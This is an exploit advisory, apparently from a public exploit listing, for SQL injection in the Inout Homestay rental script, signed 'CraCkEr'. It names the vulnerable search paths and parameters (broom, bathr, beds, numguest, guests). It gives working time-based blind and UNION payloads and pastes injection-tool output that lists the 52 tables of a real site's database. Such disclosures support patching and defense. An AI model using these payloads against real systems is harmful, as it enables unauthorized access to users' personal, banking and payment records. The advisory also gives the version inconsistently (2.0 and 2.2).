Headline
Inout Homestay 2.2 SQL Injection
Inout Homestay version 2.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : inoutscripts.com ││ Vendor : Inout Scripts - Nesote Technologies Private Limited ││ Software : Inout Homestay 2.2 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php?page=search/searchdetailedbroom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=IndianapolisPOST parameter 'broom' is vulnerable to SQLIPOST parameter 'bathr' is vulnerable to SQLIPOST parameter 'beds' is vulnerable to SQLIPOST parameter 'numguest' is vulnerable to SQLIPath: /index.php?page=search/rentalslocation=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=IndianaPOST parameter 'guests' is vulnerable to SQLI---Parameter: broom (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split Type: UNION query Title: Generic UNION query (NULL) - 27 columns Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_homestay'Database: *****_homestay[52 tables]+----------------------------------+| admin_account || admin_payment_details || category_property || chat_details || chat_messages || checkout_ipn || countries || coupon_detail || cron_details || custom_field || demo_message || email_details || email_templates || forgetpassword || host_rejected || inout_ipns || languages || list_date_request || list_images || listing_date || listing_detail || listing_main || message_notify_app || messages || msg_req_temp || ppc_currency || public_side_media_detail || public_slide_images || refund_creditupdate || request_coupon_detail || settings || superhost_detail || traveller_bank_deposit_history || traveller_cancellation_modes || traveller_cancelled || user_account_detail || user_address_verify_request || user_details || user_email_verification || user_listing_request || user_refunddetails || user_registration || user_reviews || user_search_details || user_settings || user_wishlist_mapping || user_withdrawal_details || userabusereport || userbank_pending_listing_request || usercancellationsaction || wish_list || withdrawal_request |+----------------------------------+[-] Done